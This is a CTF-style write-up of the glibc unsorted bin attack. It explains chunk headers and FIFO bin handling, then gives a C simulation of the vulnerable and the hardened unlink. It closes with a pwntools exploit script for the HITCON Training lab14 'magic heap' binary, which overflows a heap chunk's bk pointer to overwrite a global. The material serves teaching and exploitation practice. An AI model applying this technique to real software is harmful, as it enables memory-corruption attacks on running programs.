When the program calls malloc and no chunk of the requested size is found in the fastbins or small bins, it tries the unsorted bin. If the chunk taken out fits exactly, it is returned to the user directly; otherwise the chunks that were examined are moved into their corresponding bins.
The premise of the unsorted bin attack is that the bk pointer of a chunk in the unsorted bin is under our control.
We can overwrite that bk (which points to the next chunk down the list) with addr - 2 * size, where size is the word size (4 bytes in a 32-bit program, 8 bytes in a 64-bit one).
This changes the value stored at addr. Any address can be modified this way, but it can only be changed to one fixed large value, not to an arbitrary one.
Why addr - 2 * size?
A complete chunk starts with two header words, prev_size and size, followed by fd and bk once the chunk is free.
We can therefore construct a fake chunk around addr.
If we modify the bk of a chunk in the list to point to addr - 2 * size, that location is treated as the fake chunk's prev_size,
and addr itself lines up with the fake chunk's fd.
When that chunk is taken out (it is in fact the last chunk in the unsorted bin; we modify its bk so that the fake chunk sits after it), the unsorted bin code in turn updates the fake chunk's fd to a large value.
The unsorted bin works FIFO, first in first out:
a newly freed chunk is placed at the head of the list, and when malloc takes chunks out it walks from the tail of the list until it finds a chunk whose size fits, or until it has walked the whole list.
Chunks that are walked past without being chosen are moved to the appropriate bin (that is, they get sorted).
Compared with the other bins, the unsorted bin can be seen as a bin without size classes: a chunk's presence there only means it has not been sorted yet.
Notice that the chunk's own fd pointer is not used here, but the write does corrupt the unsorted bin list: if a new chunk is later added to the unsorted bin, an error will occur.
So the fake chunk's fd (at addr) is updated to point to the address of the unsorted bin head; that is the "large value" mentioned above.
Because the unsorted bin's bk pointed at the real chunk rather than at the fake one, the fake chunk itself is not walked during this allocation.
Next, a few notes on size.
A chunk size must be a multiple of 2 * SIZE_SZ (SIZE_SZ is 4 in a 32-bit program and 8 in a 64-bit one).
A request that is not a multiple is rounded up to the smallest multiple larger than it.
Whether the program is 32- or 64-bit, this does not affect the low three bits of the size field, which have special meanings.
From high to low they are:
NON_MAIN_ARENA: records whether the current chunk belongs to the main thread's arena; 1 means it does not, 0 means it does.
IS_MMAPPED: records whether the current chunk was allocated by mmap.
PREV_INUSE: records whether the previous chunk is allocated. In general the size field of the first chunk of the heap has its P bit set to 1, to prevent illegal access to the memory in front of it.
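The removal step and the size-field rules above, as an added model in C. This is not glibc's source and not part of the original writeup; it is a self-contained simulation that uses the same four-word chunk layout and the same pointer writes malloc performs, under names of its own (unsorted_insert, unsorted_take, unsorted_take_checked, request2size, run_demo are all assumed here). The bin head is modelled as a chunk whose fd and bk point to itself, and a local word stands in for the lab's magic variable. unsorted_take_checked adds the list-integrity check that glibc 2.29 and later run before unlinking, so the vulnerable and the hardened removal sit side by side.

```c
/* Added model of the unsorted-bin removal step and of the size field.
 * Not glibc source and not the page's script: a self-contained simulation
 * using the same chunk layout and the same pointer writes malloc performs. */
#include <stddef.h>
#include <stdio.h>

#define SIZE_SZ        (sizeof(size_t))
#define MALLOC_ALIGN   (2 * SIZE_SZ)
#define MIN_CHUNK      (4 * SIZE_SZ)
#define PREV_INUSE     ((size_t)0x1)
#define IS_MMAPPED     ((size_t)0x2)
#define NON_MAIN_ARENA ((size_t)0x4)
#define SIZE_BITS      (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

/* Chunk header as malloc sees it: prev_size, size, then fd/bk once free. */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* Low three bits of size are flags, high to low: A (NON_MAIN_ARENA),
 * M (IS_MMAPPED), P (PREV_INUSE); the remaining bits are the real size. */
size_t chunksize(const struct chunk *p)      { return p->size & ~SIZE_BITS; }
int    prev_inuse(const struct chunk *p)     { return (p->size & PREV_INUSE) != 0; }
int    is_mmapped(const struct chunk *p)     { return (p->size & IS_MMAPPED) != 0; }
int    non_main_arena(const struct chunk *p) { return (p->size & NON_MAIN_ARENA) != 0; }

/* Request size -> chunk size: SIZE_SZ of header overhead, rounded up to a
 * multiple of 2*SIZE_SZ, never below the four-word minimum chunk. */
size_t request2size(size_t req) {
    size_t sz = (req + SIZE_SZ + MALLOC_ALIGN - 1) & ~(MALLOC_ALIGN - 1);
    return sz < MIN_CHUNK ? MIN_CHUNK : sz;
}

/* free() side: a chunk enters the unsorted bin at the head (bin->fd). */
void unsorted_insert(struct chunk *bin, struct chunk *p) {
    struct chunk *fwd = bin->fd;
    p->fd = fwd;
    p->bk = bin;
    bin->fd = p;
    fwd->bk = p;
}

/* malloc() side: the victim comes off the tail (bin->bk), hence FIFO.
 * The last write stores the bin head's address through victim->bk->fd;
 * with a controlled bk, that is the write the attack redirects. */
struct chunk *unsorted_take(struct chunk *bin) {
    struct chunk *victim = bin->bk;
    struct chunk *bck = victim->bk;
    bin->bk = bck;
    bck->fd = bin;
    return victim;
}

/* Same removal with the list-integrity check glibc 2.29 and later perform
 * first; NULL stands for the abort "malloc(): unsorted double linked list corrupted". */
struct chunk *unsorted_take_checked(struct chunk *bin) {
    struct chunk *victim = bin->bk;
    struct chunk *bck = victim->bk;
    if (bck->fd != victim || victim->fd != bin)
        return NULL;
    bin->bk = bck;
    bck->fd = bin;
    return victim;
}

struct demo_result {
    int target_got_bin_addr; /* the word at addr now holds the bin head address */
    int victim_was_real;     /* the chunk handed out is still the genuine one */
    int bin_tail_is_fake;    /* bin->bk now points at the fake chunk */
    int checked_refuses;     /* the 2.29+ check rejects the corrupted list */
};

/* The target word (standing in for the lab's "magic") is the fd slot of a
 * fake chunk, so the fake chunk begins at addr - 2*SIZE_SZ. */
struct demo_result run_demo(void) {
    struct chunk bin, real, fake = {0, 0, NULL, NULL};
    struct demo_result r;
    char *addr = (char *)&fake.fd;               /* the word we want changed */
    bin.fd = bin.bk = &bin;                      /* empty bin points to itself */
    real.size = request2size(0x80) | PREV_INUSE; /* the lab's 0x91 on 64-bit */
    unsorted_insert(&bin, &real);                /* real chunk is freed */
    real.bk = (struct chunk *)(addr - 2 * SIZE_SZ);            /* the overflow's effect */
    r.checked_refuses = (unsorted_take_checked(&bin) == NULL); /* no writes on refusal */
    struct chunk *got = unsorted_take(&bin);     /* older glibc goes ahead */
    r.target_got_bin_addr = (fake.fd == &bin);
    r.victim_was_real = (got == &real);
    r.bin_tail_is_fake = (bin.bk == &fake);
    return r;
}

int main(void) {
    struct demo_result r = run_demo();
    printf("target <- bin head: %d, victim real: %d, bin tail is fake: %d, check refuses: %d\n",
           r.target_got_bin_addr, r.victim_was_real, r.bin_tail_is_fake, r.checked_refuses);
    return 0;
}
```

Two things the run makes visible that the prose only states: the value written at addr is exactly the bin head's address and nothing else, and after the removal the bin's tail is the fake chunk, which is why any later allocation that walks the unsorted bin trips over it. The checked variant shows the mitigation side: once the list is verified before unlinking, the corrupted bk is refused before the write happens.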
Challenge
HITCON Training lab14 magic heap
The goal is to change the value of magic to something greater than 0x1305.
The edit function lets us specify the size as well as the content.
When no bin contains a chunk that fits, the program splits a chunk of the corresponding size off the top chunk,
so the chunks we allocate one after another at the start of the program have consecutive addresses.
Further, since edit can write any amount of content into a chunk, we can write past the end of one chunk into the freed chunk adjacent to it.
```python
from pwn import *

io = process('./mag')

def add(size, content):
    io.recvuntil(":")
    io.sendline("1")
    io.recvuntil(":")
    io.sendline(str(size))
    io.recvuntil(":")
    io.sendline(content)

def edit(idx, size, content):
    io.recvuntil(":")
    io.sendline("2")
    io.recvuntil(":")
    io.sendline(str(idx))
    io.recvuntil(":")
    io.sendline(str(size))
    io.recvuntil(":")
    io.sendline(content)

def cut(idx):
    io.recvuntil(":")
    io.sendline("3")
    io.recvuntil(":")
    io.sendline(str(idx))

add(0x20, '0x20')  # 0
add(0x80, '0x80')  # 1: a 0x90-byte chunk, lands in the unsorted bin when freed
add(0x20, '0x20')  # 2: keeps chunk 1 from merging into the top chunk
cut(1)             # free chunk 1 -> unsorted bin

# Overflow from chunk 0 into the header of freed chunk 1: keep prev_size and
# size intact, set bk to magic - 0x10 so that magic overlays the fake chunk's fd.
prev_size = 0
size = 0x91          # 0x90 | PREV_INUSE
fd = 0
bk = 0x6020C0 - 0x10  # 0x6020C0 is the address of magic
payload = b'A' * 0x20 + p64(prev_size) + p64(size) + p64(fd) + p64(bk)
edit(0, 0x20 * 2, payload)

add(0x80, '0x80')  # take chunk 1 back out; magic receives the unsorted bin address

io.recvuntil(":")
io.sendline("4869")
io.interactive()
```